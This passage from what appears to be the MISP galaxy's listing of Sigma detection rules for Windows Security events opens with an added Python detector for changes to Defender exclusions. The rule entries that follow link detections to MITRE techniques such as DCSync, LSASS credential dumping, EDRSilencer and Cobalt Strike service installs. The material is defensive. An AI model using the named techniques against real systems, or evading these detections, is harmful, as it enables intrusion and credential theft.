https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_windows_defender_exclusions_registry_modified.yml
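The two Defender exclusion rules above ("Write Access Requested" and "Exclusion List Modified") both key on Security-log registry auditing under the Exclusions key. The following is an added example, not code from the MISP galaxy or the Sigma project, that runs that logic over a few constructed 4656/4657/4663 records. Assumptions: the events are dictionaries keyed by the Security log's EventData field names, registry write access is the KEY_SET_VALUE bit (0x2) of AccessMask, and the sample process paths and user names are invented.

```python
import re

# Registry path, as written in ObjectName of 4656/4657/4663 events, under which
# Defender keeps its exclusion lists (sub-keys: Paths, Extensions, Processes, ...).
EXCLUSIONS_RE = re.compile(r"\\Microsoft\\Windows Defender\\Exclusions\\", re.I)
KEY_SET_VALUE = 0x0002  # registry write right in AccessMask (assumption, see lead-in)

SAMPLE_REG = [  # constructed sample events, not real log data
    {"EventID": 4657, "SubjectUserName": "jdoe",
     "ProcessName": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ObjectName": r"\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths",
     "ObjectValueName": r"C:\Users\jdoe\AppData\Local\Temp", "OperationType": "%%1905"},
    {"EventID": 4663, "SubjectUserName": "SYSTEM",
     "ProcessName": r"C:\Program Files\Windows Defender\MsMpEng.exe",
     "ObjectName": r"\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths",
     "AccessMask": "0x1"},  # read only: Defender reading its own configuration
    {"EventID": 4656, "SubjectUserName": "jdoe",
     "ProcessName": r"C:\Windows\System32\reg.exe",
     "ObjectName": r"\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Extensions",
     "AccessMask": "0x2"},  # handle requested with write access
    {"EventID": 4657, "SubjectUserName": "jdoe",
     "ProcessName": r"C:\Windows\System32\reg.exe",
     "ObjectName": r"\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run",
     "ObjectValueName": "Updater"},  # unrelated key, ignored here
]


def defender_exclusion_change(ev):
    """Classify one registry audit event; returns a verdict string or None."""
    if not EXCLUSIONS_RE.search(ev.get("ObjectName", "")):
        return None
    eid = ev.get("EventID")
    if eid == 4657:
        # Registry value modified: the exclusion now exists, name the value.
        return "exclusion value modified: " + ev.get("ObjectValueName", "?")
    if eid in (4656, 4663):
        # Handle requested (4656) or object accessed (4663): only write access matters.
        try:
            mask = int(ev.get("AccessMask", "0x0"), 16)
        except ValueError:
            return None
        if mask & KEY_SET_VALUE:
            return "write access requested" if eid == 4656 else "write access used"
    return None


def exclusion_alerts(events):
    """Return (user, process, verdict) for every event that touches the exclusions."""
    out = []
    for ev in events:
        verdict = defender_exclusion_change(ev)
        if verdict:
            out.append((ev.get("SubjectUserName", "?"), ev.get("ProcessName", "?"), verdict))
    return out


if __name__ == "__main__":
    for user, proc, verdict in exclusion_alerts(SAMPLE_REG):
        print(f"{user} via {proc}: {verdict}")
```

Both rules need a SACL on the Exclusions key before any of these events are generated; without object-access auditing configured the detector sees nothing. Legitimate administration through the Defender management interfaces produces the same events, so tune on SubjectUserName and ProcessName rather than suppressing the key.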

Suspicious Access to Sensitive File Extensions

Detects known sensitive file extensions accessed on a network share

The tag is: misp-galaxy:sigma-rules="Suspicious Access to Sensitive File Extensions"

Suspicious Access to Sensitive File Extensions has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Data from Network Shared Drive - T1039" with estimative-language:likelihood-probability="almost-certain"

Table 9044. Table References

Links

Internal Research

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_raccess_sensitive_fext.yml

External Disk Drive Or USB Storage Device Was Recognized By The System

Detects external disk drives or plugged-in USB devices.

The tag is: misp-galaxy:sigma-rules="External Disk Drive Or USB Storage Device Was Recognized By The System"

External Disk Drive Or USB Storage Device Was Recognized By The System has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Replication Through Removable Media - T1091" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Hardware Additions - T1200" with estimative-language:likelihood-probability="almost-certain"

Table 9045. Table References

Links

https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-6416

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_external_device.yml

Add or Remove Computer from DC

Detects the creation or removal of a computer account. Can be used to detect attacks such as DCShadow via the creation of a new SPN.

The tag is: misp-galaxy:sigma-rules="Add or Remove Computer from DC"

Add or Remove Computer from DC has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Rogue Domain Controller - T1207" with estimative-language:likelihood-probability="almost-certain"

Table 9046. Table References

Links

https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4743

https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4741

https://github.com/Yamato-Security/EnableWindowsLogSettings/blob/7f6d755d45ac7cc9fc35b0cbf498e6aa4ef19def/ConfiguringSecurityLogAuditPolicies.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_add_remove_computer.yml

SCM Database Privileged Operation

Detects non-system users performing privileged operations on the SCM database

The tag is: misp-galaxy:sigma-rules="SCM Database Privileged Operation"

SCM Database Privileged Operation has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Abuse Elevation Control Mechanism - T1548" with estimative-language:likelihood-probability="almost-certain"

Table 9047. Table References

Links

https://threathunterplaybook.com/hunts/windows/190826-RemoteSCMHandle/notebook.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_scm_database_privileged_operation.yml

Suspicious Windows ANONYMOUS LOGON Local Account Created

Detects the creation of suspicious accounts whose names resemble ANONYMOUS LOGON, for example by using additional spaces. Created as a covering detection for exclusions of Logon Type 3 from ANONYMOUS LOGON accounts.

The tag is: misp-galaxy:sigma-rules="Suspicious Windows ANONYMOUS LOGON Local Account Created"

Suspicious Windows ANONYMOUS LOGON Local Account Created has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Local Account - T1136.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Domain Account - T1136.002" with estimative-language:likelihood-probability="almost-certain"

Table 9048. Table References

Links

https://twitter.com/SBousseaden/status/1189469425482829824

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_local_anon_logon_created.yml

HackTool - NoFilter Execution

Detects execution of NoFilter, a tool for abusing the Windows Filtering Platform for privilege escalation, via its hardcoded policy name indicators

The tag is: misp-galaxy:sigma-rules="HackTool - NoFilter Execution"

HackTool - NoFilter Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Access Token Manipulation - T1134" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Token Impersonation/Theft - T1134.001" with estimative-language:likelihood-probability="almost-certain"

Table 9049. Table References

Links

https://x.com/st0pp3r/status/1742203752361128162?s=20

https://www.deepinstinct.com/blog/nofilter-abusing-windows-filtering-platform-for-privilege-escalation

https://github.com/deepinstinct/NoFilter

https://github.com/deepinstinct/NoFilter/blob/121d215ab130c5e8e3ad45a7e7fcd56f4de97b4d/NoFilter/Consts.cpp

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_hktl_nofilter.yml

Protected Storage Service Access

Detects access to the protected_storage service over the network. Potential abuse of DPAPI to extract domain backup keys from Domain Controllers

The tag is: misp-galaxy:sigma-rules="Protected Storage Service Access"

Protected Storage Service Access has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="SMB/Windows Admin Shares - T1021.002" with estimative-language:likelihood-probability="almost-certain"

Table 9050. Table References

Links

https://threathunterplaybook.com/hunts/windows/190620-DomainDPAPIBackupKeyExtraction/notebook.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_protected_storage_service_access.yml

PowerShell Scripts Installed as Services - Security

Detects a PowerShell script installed as a service

The tag is: misp-galaxy:sigma-rules="PowerShell Scripts Installed as Services - Security"

PowerShell Scripts Installed as Services - Security has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Service Execution - T1569.002" with estimative-language:likelihood-probability="almost-certain"

Table 9051. Table References

Links

https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_powershell_script_installed_as_service.yml

Denied Access To Remote Desktop

This event is generated when an authenticated user who is not allowed to log on remotely attempts to connect to this computer through Remote Desktop. Often, this event can be generated by attackers when searching for available Windows servers in the network.

The tag is: misp-galaxy:sigma-rules="Denied Access To Remote Desktop"

Denied Access To Remote Desktop has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Remote Desktop Protocol - T1021.001" with estimative-language:likelihood-probability="almost-certain"

Table 9052. Table References

Links

https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=4825

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_not_allowed_rdp_access.yml

HybridConnectionManager Service Installation

Rule to detect the Hybrid Connection Manager service installation.

The tag is: misp-galaxy:sigma-rules="HybridConnectionManager Service Installation"

HybridConnectionManager Service Installation has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Compromise Client Software Binary - T1554" with estimative-language:likelihood-probability="almost-certain"

Table 9053. Table References

Links

https://twitter.com/Cyb3rWard0g/status/1381642789369286662

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_hybridconnectionmgr_svc_installation.yml

Invoke-Obfuscation RUNDLL LAUNCHER - Security

Detects Obfuscated Powershell via RUNDLL LAUNCHER

The tag is: misp-galaxy:sigma-rules="Invoke-Obfuscation RUNDLL LAUNCHER - Security"

Invoke-Obfuscation RUNDLL LAUNCHER - Security has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 9054. Table References

Links

https://github.com/SigmaHQ/sigma/issues/1009

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_invoke_obfuscation_via_rundll_services_security.yml

AD Privileged Users or Groups Reconnaissance

Detects reconnaissance of privileged users or groups based on event ID 4661 and the SIDs of known privileged users or groups

The tag is: misp-galaxy:sigma-rules="AD Privileged Users or Groups Reconnaissance"

AD Privileged Users or Groups Reconnaissance has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Domain Account - T1087.002" with estimative-language:likelihood-probability="almost-certain"

Table 9055. Table References

Links

https://blog.menasec.net/2019/02/threat-hunting-5-detecting-enumeration.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_account_discovery.yml

Active Directory Replication from Non Machine Account

Detects potential abuse of the Active Directory Replication Service (ADRS) from a non-machine account to request credentials.

The tag is: misp-galaxy:sigma-rules="Active Directory Replication from Non Machine Account"

Active Directory Replication from Non Machine Account has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="DCSync - T1003.006" with estimative-language:likelihood-probability="almost-certain"

Table 9056. Table References

Links

https://threathunterplaybook.com/hunts/windows/190101-ADModDirectoryReplication/notebook.html

https://threathunterplaybook.com/library/windows/active_directory_replication.html

https://threathunterplaybook.com/hunts/windows/180815-ADObjectAccessReplication/notebook.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_ad_replication_non_machine_account.yml

Password Protected ZIP File Opened (Email Attachment)

Detects the extraction of password protected ZIP archives. See the filename variable for more details on which file has been opened.

The tag is: misp-galaxy:sigma-rules="Password Protected ZIP File Opened (Email Attachment)"

Password Protected ZIP File Opened (Email Attachment) has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Spearphishing Attachment - T1566.001" with estimative-language:likelihood-probability="almost-certain"

Table 9057. Table References

Links

https://twitter.com/sbousseaden/status/1523383197513379841

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_opened_encrypted_zip_outlook.yml

HackTool - EDRSilencer Execution - Filter Added

Detects execution of EDRSilencer, a tool that abuses the Windows Filtering Platform (WFP) to block the outbound traffic of running EDR agents based on specific hardcoded filter names.

The tag is: misp-galaxy:sigma-rules="HackTool - EDRSilencer Execution - Filter Added"

HackTool - EDRSilencer Execution - Filter Added has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Impair Defenses - T1562" with estimative-language:likelihood-probability="almost-certain"

Table 9058. Table References

Links

https://github.com/netero1010/EDRSilencer

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_hktl_edr_silencer.yml

ETW Logging Disabled In .NET Processes - Registry

Detects potential adversaries disabling the ETW providers that record loaded .NET assemblies.

The tag is: misp-galaxy:sigma-rules="ETW Logging Disabled In .NET Processes - Registry"

ETW Logging Disabled In .NET Processes - Registry has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Impair Defenses - T1562" with estimative-language:likelihood-probability="almost-certain"

Table 9060. Table References

Links

https://github.com/dotnet/runtime/blob/ee2355c801d892f2894b0f7b14a20e6cc50e0e54/docs/design/coreclr/jit/viewing-jit-dumps.md#setting-configuration-variables

https://i.blackhat.com/EU-21/Wednesday/EU-21-Teodorescu-Veni-No-Vidi-No-Vici-Attacks-On-ETW-Blind-EDRs.pdf

https://twitter.com/xpn/status/1268712093928378368

https://bunnyinside.com/?term=f71e8cb9c76a

http://managed670.rssing.com/chan-5590147/all_p1.html

https://social.msdn.microsoft.com/Forums/vstudio/en-US/0878832e-39d7-4eaf-8e16-a729c4c40975/what-can-i-use-e13c0d23ccbc4e12931bd9cc2eee27e4-for?forum=clr

https://github.com/dotnet/runtime/blob/f62e93416a1799aecc6b0947adad55a0d9870732/src/coreclr/src/inc/clrconfigvalues.h#L35-L38

https://github.com/dotnet/runtime/blob/4f9ae42d861fcb4be2fcd5d3d55d5f227d30e723/docs/coding-guidelines/clr-jit-coding-conventions.md#1412-disabling-code

https://github.com/dotnet/runtime/blob/7abe42dc1123722ed385218268bb9fe04556e3d3/src/coreclr/src/inc/clrconfig.h#L33-L39

https://github.com/dotnet/runtime/search?p=1&q=COMPlus_&unscoped_q=COMPlus_

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_dot_net_etw_tamper.yml

SAM Registry Hive Handle Request

Detects handles requested to the SAM registry hive

The tag is: misp-galaxy:sigma-rules="SAM Registry Hive Handle Request"

SAM Registry Hive Handle Request has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Query Registry - T1012" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Credentials in Registry - T1552.002" with estimative-language:likelihood-probability="almost-certain"

Table 9061. Table References

Links

https://threathunterplaybook.com/hunts/windows/190725-SAMRegistryHiveHandleRequest/notebook.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_sam_registry_hive_handle_request.yml

SysKey Registry Keys Access

Detects handle requests and access operations to specific registry keys to calculate the SysKey

The tag is: misp-galaxy:sigma-rules="SysKey Registry Keys Access"

SysKey Registry Keys Access has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Query Registry - T1012" with estimative-language:likelihood-probability="almost-certain"

Table 9062. Table References

Links

https://threathunterplaybook.com/hunts/windows/190625-RegKeyAccessSyskey/notebook.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_syskey_registry_access.yml

Suspicious Scheduled Task Creation

Detects suspicious scheduled task creation events, based on attributes such as paths, command line flags, etc.

The tag is: misp-galaxy:sigma-rules="Suspicious Scheduled Task Creation"

Suspicious Scheduled Task Creation has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"

Table 9063. Table References

Links

https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4698

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_scheduled_task_creation.yml

RDP over Reverse SSH Tunnel WFP

Detects svchost hosting the RDP service (termsvcs) communicating with the loopback address

The tag is: misp-galaxy:sigma-rules="RDP over Reverse SSH Tunnel WFP"

RDP over Reverse SSH Tunnel WFP has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Internal Proxy - T1090.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="External Proxy - T1090.002" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Remote Desktop Protocol - T1021.001" with estimative-language:likelihood-probability="almost-certain"

Table 9064. Table References

Links

https://twitter.com/SBousseaden/status/1096148422984384514

https://github.com/sbousseaden/EVTX-ATTACK-SAMPLES/blob/44fbe85f72ee91582876b49678f9a26292a155fb/Command%20and%20Control/DE_RDP_Tunnel_5156.evtx

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_rdp_reverse_tunnel.yml

Azure AD Health Service Agents Registry Keys Access

This detection uses Windows security events to detect suspicious access attempts to the registry key values and sub-keys of Azure AD Health service agents (e.g. AD FS). Information from AD Health service agents can be used to potentially abuse some of the features provided by those services in the cloud (e.g. Federation). This detection requires an access control entry (ACE) on the system access control list (SACL) of the following securable object: HKLM:\SOFTWARE\Microsoft\ADHealthAgent. Make sure you set the SACL to propagate to its sub-keys.

The tag is: misp-galaxy:sigma-rules="Azure AD Health Service Agents Registry Keys Access"

Azure AD Health Service Agents Registry Keys Access has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Query Registry - T1012" with estimative-language:likelihood-probability="almost-certain"

Table 9065. Table References

Links

https://github.com/OTRF/Set-AuditRule/blob/c3dec5443414231714d850565d364ca73475ade5/rules/registry/aad_connect_health_service_agent.yml

https://o365blog.com/post/hybridhealthagent/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_aadhealth_svc_agent_regkey_access.yml

Password Dumper Activity on LSASS

Detects a process handle on the LSASS process with certain access masks and object type SAM_DOMAIN

The tag is: misp-galaxy:sigma-rules="Password Dumper Activity on LSASS"

Password Dumper Activity on LSASS has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"

Table 9066. Table References

Links

https://twitter.com/jackcr/status/807385668833968128

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_lsass_dump.yml

Suspicious Teams Application Related ObjectAcess Event

Detects access to the authentication tokens and accounts of the Microsoft Teams desktop application.

The tag is: misp-galaxy:sigma-rules="Suspicious Teams Application Related ObjectAcess Event"

Suspicious Teams Application Related ObjectAcess Event has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Steal Application Access Token - T1528" with estimative-language:likelihood-probability="almost-certain"

Table 9067. Table References

Links

https://www.vectra.ai/blogpost/undermining-microsoft-teams-security-by-mining-tokens

https://www.bleepingcomputer.com/news/security/microsoft-teams-stores-auth-tokens-as-cleartext-in-windows-linux-macs/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_teams_suspicious_objectaccess.yml

Weak Encryption Enabled and Kerberoast

Detects scenarios where weak encryption is enabled for a user account, which could be used for hash/password cracking.

The tag is: misp-galaxy:sigma-rules="Weak Encryption Enabled and Kerberoast"

Weak Encryption Enabled and Kerberoast has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

Table 9068. Table References

Links

https://adsecurity.org/?p=2053

https://blog.harmj0y.net/redteaming/another-word-on-delegation/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_alert_enable_weak_encryption.yml

User Added to Local Administrator Group

Detects the addition of a new member to the local administrator group, which could be legitimate activity or a sign of privilege escalation activity

The tag is: misp-galaxy:sigma-rules="User Added to Local Administrator Group"

User Added to Local Administrator Group has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Valid Accounts - T1078" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Account Manipulation - T1098" with estimative-language:likelihood-probability="almost-certain"

Table 9069. Table References

Links

https://learn.microsoft.com/en-us/windows-server/identity/ad-ds/manage/understand-security-identifiers

https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4732

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_user_added_to_local_administrators.yml

Hidden Local User Creation

Detects the creation of a hidden local user account (a user name ending in "$"), which should not normally appear in event ID 4720.

The tag is: misp-galaxy:sigma-rules="Hidden Local User Creation"

Hidden Local User Creation has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Local Account - T1136.001" with estimative-language:likelihood-probability="almost-certain"

Table 9070. Table References

Links

https://twitter.com/SBousseaden/status/1387743867663958021

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_hidden_user_creation.yml

Password Protected ZIP File Opened (Suspicious Filenames)

Detects the extraction of password protected ZIP archives with suspicious file names. See the filename variable for more details on which file has been opened.

The tag is: misp-galaxy:sigma-rules="Password Protected ZIP File Opened (Suspicious Filenames)"

Password Protected ZIP File Opened (Suspicious Filenames) has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Masquerading - T1036" with estimative-language:likelihood-probability="almost-certain"

Table 9071. Table References

Links

https://twitter.com/sbousseaden/status/1523383197513379841

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_opened_encrypted_zip_filename.yml

SMB Create Remote File Admin Share

Detects non-system accounts accessing a file over SMB with a write (0x2) access mask via an administrative share (e.g. C$).

The tag is: misp-galaxy:sigma-rules="SMB Create Remote File Admin Share"

SMB Create Remote File Admin Share has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="SMB/Windows Admin Shares - T1021.002" with estimative-language:likelihood-probability="almost-certain"

Table 9072. Table References

Links

https://github.com/OTRF/ThreatHunter-Playbook/blob/f7a58156dbfc9b019f17f638b8c62d22e557d350/playbooks/WIN-201012004336.yaml

https://securitydatasets.com/notebooks/atomic/windows/lateral_movement/SDWIN-200806015757.html?highlight=create%20file

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_smb_file_creation_admin_shares.yml

Processes Accessing the Microphone and Webcam

Detects potential adversaries accessing the microphone and webcam on an endpoint.

The tag is: misp-galaxy:sigma-rules="Processes Accessing the Microphone and Webcam"

Processes Accessing the Microphone and Webcam has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Audio Capture - T1123" with estimative-language:likelihood-probability="almost-certain"

Table 9073. Table References

Links

https://medium.com/@7a616368/can-you-track-processes-accessing-the-camera-and-microphone-7e6885b37072

https://twitter.com/duzvik/status/1269671601852813320

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_camera_microphone_access.yml

Possible PetitPotam Coerce Authentication Attempt

Detects PetitPotam coerced authentication activity.

The tag is: misp-galaxy:sigma-rules="Possible PetitPotam Coerce Authentication Attempt"

Possible PetitPotam Coerce Authentication Attempt has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Forced Authentication - T1187" with estimative-language:likelihood-probability="almost-certain"

Table 9074. Table References

Links

https://github.com/splunk/security_content/blob/0dd6de32de2118b2818550df9e65255f4109a56d/detections/endpoint/petitpotam_network_share_access_request.yml

https://github.com/topotam/PetitPotam

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_petitpotam_network_share.yml

Potential AD User Enumeration From Non-Machine Account

Detects read access to a domain user from a non-machine account

The tag is: misp-galaxy:sigma-rules="Potential AD User Enumeration From Non-Machine Account"

Potential AD User Enumeration From Non-Machine Account has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Domain Account - T1087.002" with estimative-language:likelihood-probability="almost-certain"

Table 9075. Table References

Links

https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4662

https://docs.microsoft.com/en-us/windows/win32/adschema/attributes-all

http://www.stuffithoughtiknew.com/2019/02/detecting-bloodhound.html

https://www.specterops.io/assets/resources/an_ace_up_the_sleeve.pdf

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_ad_user_enumeration.yml

Active Directory User Backdoors

Detects scenarios where one can control another user's or computer's account without having to use their credentials.

The tag is: misp-galaxy:sigma-rules="Active Directory User Backdoors"

Active Directory User Backdoors has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Account Manipulation - T1098" with estimative-language:likelihood-probability="almost-certain"

Table 9076. Table References

Links

https://adsecurity.org/?p=3466

https://msdn.microsoft.com/en-us/library/cc220234.aspx

https://blog.harmj0y.net/redteaming/another-word-on-delegation/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_alert_ad_user_backdoors.yml

Possible Shadow Credentials Added

Detects the possible addition of shadow credentials to an Active Directory object.

The tag is: misp-galaxy:sigma-rules="Possible Shadow Credentials Added"

Possible Shadow Credentials Added has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Modify Authentication Process - T1556" with estimative-language:likelihood-probability="almost-certain"

Table 9077. Table References

Links

https://www.elastic.co/guide/en/security/8.4/potential-shadow-credentials-added-to-ad-object.html

https://twitter.com/SBousseaden/status/1581300963650187264?

https://cyberstoph.org/posts/2022/03/detecting-shadow-credentials/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_possible_shadow_credentials_added.yml

WCE wceaux.dll Access

Detects access to wceaux.dll during WCE pass-the-hash remote command execution on the source host

The tag is: misp-galaxy:sigma-rules="WCE wceaux.dll Access"

WCE wceaux.dll Access has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="OS Credential Dumping - T1003" with estimative-language:likelihood-probability="almost-certain"

Table 9078. Table References

Links

https://jpcertcc.github.io/ToolAnalysisResultSheet

https://www.jpcert.or.jp/english/pub/sr/ir_research.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_mal_wceaux_dll.yml

CobaltStrike Service Installations - Security

Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or performs lateral movement

The tag is: misp-galaxy:sigma-rules="CobaltStrike Service Installations - Security"

CobaltStrike Service Installations - Security has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="SMB/Windows Admin Shares - T1021.002" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Service Execution - T1569.002" with estimative-language:likelihood-probability="almost-certain"

Table 9079. Table References

Links

https://www.sans.org/webcasts/119395

https://thedfirreport.com/2021/08/29/cobalt-strike-a-defenders-guide/

https://www.crowdstrike.com/blog/getting-the-bacon-from-cobalt-strike-beacon/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_cobaltstrike_service_installs.yml

A New Trust Was Created To A Domain

Detects the creation of a new trust to a domain. Adding a domain trust is rare and should be verified for legitimacy.

The tag is: misp-galaxy:sigma-rules="A New Trust Was Created To A Domain"

A New Trust Was Created To A Domain has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Account Manipulation - T1098" with estimative-language:likelihood-probability="almost-certain"

Table 9080. Table References

Links

https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4706

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_add_domain_trust.yml

Mimikatz DC Sync

Detects Mimikatz DC sync security events

The tag is: misp-galaxy:sigma-rules="Mimikatz DC Sync"

Mimikatz DC Sync has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="DCSync - T1003.006" with estimative-language:likelihood-probability="almost-certain"

Table 9081. Table References

Links

https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4662

https://gist.github.com/gentilkiwi/dcc132457408cf11ad2061340dcb53c2

https://blog.blacklanternsecurity.com/p/detecting-dcsync?s=r

https://twitter.com/gentilkiwi/status/1003236624925413376

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_dcsync.yml

Account Tampering - Suspicious Failed Logon Reasons

This method uses uncommon error codes on failed logons to determine suspicious activity and tampering with accounts that have been disabled or somehow restricted.

The tag is: misp-galaxy:sigma-rules="Account Tampering - Suspicious Failed Logon Reasons"

Account Tampering - Suspicious Failed Logon Reasons has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Valid Accounts - T1078" with estimative-language:likelihood-probability="almost-certain"

Table 9082. Table References

Links

https://twitter.com/SBousseaden/status/1101431884540710913

https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4625

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_failed_logon_reasons.yml

Service Installed By Unusual Client - Security

Detects a service installed by a client which has PID 0 or whose parent has PID 0

The tag is: misp-galaxy:sigma-rules="Service Installed By Unusual Client - Security"

Service Installed By Unusual Client - Security has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Create or Modify System Process - T1543" with estimative-language:likelihood-probability="almost-certain"

Table 9083. Table References

Links

